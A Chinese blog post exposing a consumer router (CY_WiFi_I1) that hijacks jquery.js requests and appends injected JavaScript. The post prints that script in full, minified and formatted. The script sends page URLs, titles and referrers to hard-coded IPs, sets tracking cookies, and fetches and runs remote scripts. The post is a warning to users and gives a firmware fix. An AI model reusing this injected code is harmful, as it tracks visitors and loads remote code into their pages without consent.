好消息:胡歌网摘新面貌迎接2015~!

触云爱路由劫持网页投放广告,劫持jquery.js

网络技术 胡歌 1827浏览 0评论

这个会劫持网页的触云爱路由的情况如下:
固件型号 CY_WiFi_I1
固件版本 1.26.2 (201608221622)

其他版本的不清楚。

具体表现为:遇到网页里面有引用jquery.js的就会被重定向到劫持的网站上去,在原先的jquery.js后面追加一行增加广告/恶意代码。(具体代码中下面)

比如访问http://www.ptent.net/wp-content/themes/ptent/js/jquery.js
就被重定向到http://110.92.64.70:9001/api/js/?link=/rd/www.ptent.net/wp-content/themes/ptent/js/jquery.js?tid=%2205ca52154c1a%22&rid=%2222c0c0bea425%22

被增加的内容如下:

;!function(win){var c={log_url:"http://110.92.64.67:6010",ad_url:"http://110.92.64.70:9003",cookie_url:"http://110.92.64.70/get/cookie/",is_log:true,is_decode:true,domain:document.domain.substring(document.domain.indexOf(".")+1,document.domain.length),get_ad:function(){var iframes=document.getElementsByTagName("IFRAME");if(iframes.length<1){return[]}var i=0,domain=document.location.protocol+"//"+document.location.host,property={},adx=[],doc=null;for(i;i<iframes.length;i++){property=[];doc=iframes[i];if(doc.style.visibility!="hidden"&&typeof doc.src!=="undefined"&&doc.src!==""){if(doc.src.indexOf("http")<0||doc.src.indexOf(domain)==0){continue}property.push("s="+encodeURIComponent(doc.src));property.push("i="+(typeof doc.id!=="undefined"?doc.id:""));property.push("w="+doc.offsetWidth);property.push("h="+doc.offsetHeight);property.push("l="+doc.offsetLeft);property.push("tp="+doc.offsetTop);adx.push(property)}}return adx},is_mobile:function(){var e=navigator.userAgent;return !!e.match(/AppleWebKit.*Mobile.*/)||"ontouchstart" in document.documentElement},client:function(){var l=[],b=window.document.body;l.push("url="+encodeURIComponent(document.location.href));l.push("t="+encodeURIComponent(document.title));l.push("sl="+b.scrollWidth);l.push("sh="+b.scrollHeight);return l},image:function(url,callback){var img=new Image;img.src=url;if(typeof callback==="function"){img.onload=function(){callback()}}return img},get_ads:function(){var ads=this.get_ad();if(ads!=""){var ad="",i=0,counts=ads.length,client=this.client().join("&"),val="";for(i;i<counts;i++){ad=ads[i].join("&");this.image(this.log_url+"/api/v1/p/?"+client+"&"+ad)}}},init:function(){var u=document.currentScript.getAttribute("u"),ur=document.currentScript.getAttribute("src"),tid=e.cookie("wf_tid"),rid=e.cookie("wf_rid");if(typeof u!==undefined&&u!==null&&u.indexOf("|")>-1){var p=u.split("|");tid=p[0];rid=p[1];e.load(tid,rid)}else{if(ur.indexOf("?u=")>-1&&ur.indexOf("|")>-1){ur=ur.substring(ur.indexOf("?u=")+3,ur.length);var p=ur.split("|");tid=p[0];rid=p[1];e.load(tid,rid)}else{if(tid==null||rid==null){e.load_js(this.cookie_url,function(d){var dm=document.domain.substring(document.domain.indexOf(".")+1,document.domain.length);if(d.tid!=null&&d.tid!=""){e.cookie("wf_tid",d.tid,365,dm)}if(d.rid!=null&&d.rid!=""){e.cookie("wf_rid",d.rid,365,dm)}e.load(d.tid,d.rid)},true)}else{e.load(tid,rid)}}}if(this.is_log){this.get_ads()}}};var e={is_load:function(){if(self.frameElement&&self.frameElement.tagName=="IFRAME"||window.frames.length!=parent.frames.length||self!=top||document.location.href.indexOf(".gov.cn")>-1){return false}return true},load_js:function(url,callback,is_json,charset){var _doc=document.getElementsByTagName("head")[0],js=document.createElement("script"),cf="jQ"+new Date().getTime()+""+Math.floor(Math.random()*10),n=null;if(typeof callback==="undefined"){callback=function(){}}if(typeof charset==="undefined"){charset="utf-8"}if(typeof is_json!=="undefined"&&is_json==true){eval(cf+"= function(msg) {return "+callback+"(msg);};");url+=(url.indexOf("?")>-1?"&":"?")+"callback="+cf}js.setAttribute("charset",charset);js.setAttribute("type","text/javascript");js.setAttribute("src",url);_doc.appendChild(js);if(typeof js.onload!=="undefined"){js.onload=function(){if(!is_json){callback()}n=js.parentNode;if(n){n.removeChild(js)}}}else{js.onreadystatechange=function(){if(js.readyState=="loaded"||js.readyState=="complete"){js.onreadystatechange=null;if(!is_json){callback&&callback()}n=js.parentNode;if(n){n.removeChild(js)}}}}return false},cookie:function(name,value,day,domain){if(arguments.length==1){var a=document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));if(a!=null){return decodeURIComponent(a[2])}return null}else{if(!arguments[1]){document.cookie=name+"=0; path=/"+((domain)?"; domain="+domain:"")+"; expires=Fri, 02-Jan-1970 00:00:00 GMT"}else{var e=new Date;if(!day){e.setTime(e.getTime()+24*60*60*1000)}else{e.setTime(e.getTime()+day*24*60*60*1000)}e="; expires="+e.toGMTString();document.cookie=name+"="+value+e+"; path=/"+((domain)?";domain="+domain:"")}}},decode:function(code){var a=[],d=[],k="",m=[],c="";for(var i=0;i<6;i++){k=code.charAt(i*2)+""+code.charAt(i*2+1);a.push(parseInt(k,16))}d[0]=a[0]>>6|a[5]<<2;d[1]=a[1]>>6|a[4]<<2;d[2]=a[2]>>6|a[3]<<2;d[3]=a[3]>>6|a[2]<<2;d[4]=a[4]>>6|a[1]<<2;d[5]=a[5]>>6|a[0]<<2;for(var j=0;j<6;j++){c=(d[j]&255).toString(16);if(c.length==1){c="0"+c}m.push(c)}return m.join("")},load:function(rid,tid){if(rid||tid){rid=decodeURI(rid).replace(/"/g,"");tid=decodeURI(tid).replace(/"/g,"");if(c.is_decode){rid=this.decode(rid);tid=this.decode(tid)}}var url=c.ad_url+"/api/v1/get_ad/?uri="+encodeURIComponent(document.location.href)+"&title="+encodeURIComponent(document.title)+"&rid="+rid+"&tid="+tid+"&plat="+(c.is_mobile()?"m":"pc")+"&ref="+encodeURIComponent(document.referrer);e.load_js(url,function(msg){if(msg!==null&&msg!==""&&msg.url!==""){win._cadx.load_js(msg.url)}},true)}};var cy_adx=function(){if(e.is_load()){c.init()}};win._cadx=e;cy_adx()}(window);

以下是格式化后的代码:

function(win) {
    var c = {
        log_url: "http://110.92.64.67:6010",
        ad_url: "http://110.92.64.70:9003",
        cookie_url: "http://110.92.64.70/get/cookie/",
        is_log: true,
        is_decode: true,
        domain: document.domain.substring(document.domain.indexOf(".") + 1, document.domain.length),
        get_ad: function() {
            var iframes = document.getElementsByTagName("IFRAME");
            if (iframes.length < 1) {
                return []
            }
            var i = 0,
            domain = document.location.protocol + "//" + document.location.host,
            property = {},
            adx = [],
            doc = null;
            for (i; i < iframes.length; i++) {
                property = [];
                doc = iframes[i];
                if (doc.style.visibility != "hidden" && typeof doc.src !== "undefined" && doc.src !== "") {
                    if (doc.src.indexOf("http") < 0 || doc.src.indexOf(domain) == 0) {
                        continue
                    }
                    property.push("s=" + encodeURIComponent(doc.src));
                    property.push("i=" + (typeof doc.id !== "undefined" ? doc.id: ""));
                    property.push("w=" + doc.offsetWidth);
                    property.push("h=" + doc.offsetHeight);
                    property.push("l=" + doc.offsetLeft);
                    property.push("tp=" + doc.offsetTop);
                    adx.push(property)
                }
            }
            return adx
        },
        is_mobile: function() {
            var e = navigator.userAgent;
            return !! e.match(/AppleWebKit.*Mobile.*/) || "ontouchstart" in document.documentElement
        },
        client: function() {
            var l = [],
            b = window.document.body;
            l.push("url=" + encodeURIComponent(document.location.href));
            l.push("t=" + encodeURIComponent(document.title));
            l.push("sl=" + b.scrollWidth);
            l.push("sh=" + b.scrollHeight);
            return l
        },
        image: function(url, callback) {
            var img = new Image;
            img.src = url;
            if (typeof callback === "function") {
                img.onload = function() {
                    callback()
                }
            }
            return img
        },
        get_ads: function() {
            var ads = this.get_ad();
            if (ads != "") {
                var ad = "",
                i = 0,
                counts = ads.length,
                client = this.client().join("&"),
                val = "";
                for (i; i < counts; i++) {
                    ad = ads[i].join("&");
                    this.image(this.log_url + "/api/v1/p/?" + client + "&" + ad)
                }
            }
        },
        init: function() {
            var u = document.currentScript.getAttribute("u"),
            ur = document.currentScript.getAttribute("src"),
            tid = e.cookie("wf_tid"),
            rid = e.cookie("wf_rid");
            if (typeof u !== undefined && u !== null && u.indexOf("|") > -1) {
                var p = u.split("|");
                tid = p[0];
                rid = p[1];
                e.load(tid, rid)
            } else {
                if (ur.indexOf("?u=") > -1 && ur.indexOf("|") > -1) {
                    ur = ur.substring(ur.indexOf("?u=") + 3, ur.length);
                    var p = ur.split("|");
                    tid = p[0];
                    rid = p[1];
                    e.load(tid, rid)
                } else {
                    if (tid == null || rid == null) {
                        e.load_js(this.cookie_url,
                        function(d) {
                            var dm = document.domain.substring(document.domain.indexOf(".") + 1, document.domain.length);
                            if (d.tid != null && d.tid != "") {
                                e.cookie("wf_tid", d.tid, 365, dm)
                            }
                            if (d.rid != null && d.rid != "") {
                                e.cookie("wf_rid", d.rid, 365, dm)
                            }
                            e.load(d.tid, d.rid)
                        },
                        true)
                    } else {
                        e.load(tid, rid)
                    }
                }
            }
            if (this.is_log) {
                this.get_ads()
            }
        }
    };
    var e = {
        is_load: function() {
            if (self.frameElement && self.frameElement.tagName == "IFRAME" || window.frames.length != parent.frames.length || self != top || document.location.href.indexOf(".gov.cn") > -1) {
                return false
            }
            return true
        },
        load_js: function(url, callback, is_json, charset) {
            var _doc = document.getElementsByTagName("head")[0],
            js = document.createElement("script"),
            cf = "jQ" + new Date().getTime() + "" + Math.floor(Math.random() * 10),
            n = null;
            if (typeof callback === "undefined") {
                callback = function() {}
            }
            if (typeof charset === "undefined") {
                charset = "utf-8"
            }
            if (typeof is_json !== "undefined" && is_json == true) {
                eval(cf + "= function(msg) {return " + callback + "(msg);};");
                url += (url.indexOf("?") > -1 ? "&": "?") + "callback=" + cf
            }
            js.setAttribute("charset", charset);
            js.setAttribute("type", "text/javascript");
            js.setAttribute("src", url);
            _doc.appendChild(js);
            if (typeof js.onload !== "undefined") {
                js.onload = function() {
                    if (!is_json) {
                        callback()
                    }
                    n = js.parentNode;
                    if (n) {
                        n.removeChild(js)
                    }
                }
            } else {
                js.onreadystatechange = function() {
                    if (js.readyState == "loaded" || js.readyState == "complete") {
                        js.onreadystatechange = null;
                        if (!is_json) {
                            callback && callback()
                        }
                        n = js.parentNode;
                        if (n) {
                            n.removeChild(js)
                        }
                    }
                }
            }
            return false
        },
        cookie: function(name, value, day, domain) {
            if (arguments.length == 1) {
                var a = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
                if (a != null) {
                    return decodeURIComponent(a[2])
                }
                return null
            } else {
                if (!arguments[1]) {
                    document.cookie = name + "=0; path=/" + ((domain) ? "; domain=" + domain: "") + "; expires=Fri, 02-Jan-1970 00:00:00 GMT"
                } else {
                    var e = new Date;
                    if (!day) {
                        e.setTime(e.getTime() + 24 * 60 * 60 * 1000)
                    } else {
                        e.setTime(e.getTime() + day * 24 * 60 * 60 * 1000)
                    }
                    e = "; expires=" + e.toGMTString();
                    document.cookie = name + "=" + value + e + "; path=/" + ((domain) ? ";domain=" + domain: "")
                }
            }
        },
        decode: function(code) {
            var a = [],
            d = [],
            k = "",
            m = [],
            c = "";
            for (var i = 0; i < 6; i++) {
                k = code.charAt(i * 2) + "" + code.charAt(i * 2 + 1);
                a.push(parseInt(k, 16))
            }
            d[0] = a[0] >> 6 | a[5] << 2;
            d[1] = a[1] >> 6 | a[4] << 2;
            d[2] = a[2] >> 6 | a[3] << 2;
            d[3] = a[3] >> 6 | a[2] << 2;
            d[4] = a[4] >> 6 | a[1] << 2;
            d[5] = a[5] >> 6 | a[0] << 2;
            for (var j = 0; j < 6; j++) {
                c = (d[j] & 255).toString(16);
                if (c.length == 1) {
                    c = "0" + c
                }
                m.push(c)
            }
            return m.join("")
        },
        load: function(rid, tid) {
            if (rid || tid) {
                rid = decodeURI(rid).replace(/"/g, "");
                tid = decodeURI(tid).replace(/"/g, "");
                if (c.is_decode) {
                    rid = this.decode(rid);
                    tid = this.decode(tid)
                }
            }
            var url = c.ad_url + "/api/v1/get_ad/?uri=" + encodeURIComponent(document.location.href) + "&title=" + encodeURIComponent(document.title) + "&rid=" + rid + "&tid=" + tid + "&plat=" + (c.is_mobile() ? "m": "pc") + "&ref=" + encodeURIComponent(document.referrer);
            e.load_js(url,
            function(msg) {
                if (msg !== null && msg !== "" && msg.url !== "") {
                    win._cadx.load_js(msg.url)
                }
            },
            true)
        }
    };
    var cy_adx = function() {
        if (e.is_load()) {
            c.init()
        }
    };
    win._cadx = e;
    cy_adx()
} (window);

看到这两个香港的服务器ip得小心了。
110.92.64.67
110.92.64.70

我也仅仅是初步发现了这一点问题,如果继续挖掘,偷取敏感/密码信息都是可能的,例如cookie这些是简简单单就到手了,毕竟上网的数据都经过该路由器

没想到触云爱路由会如此无耻,不要脸到如此地步也没谁了。

解决办法是刷其他路由器的固件,目前我刷的是如意云的固件,网页被劫持情况消失。

转载请注明:胡歌网摘 » 触云爱路由劫持网页投放广告,劫持jquery.js

发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址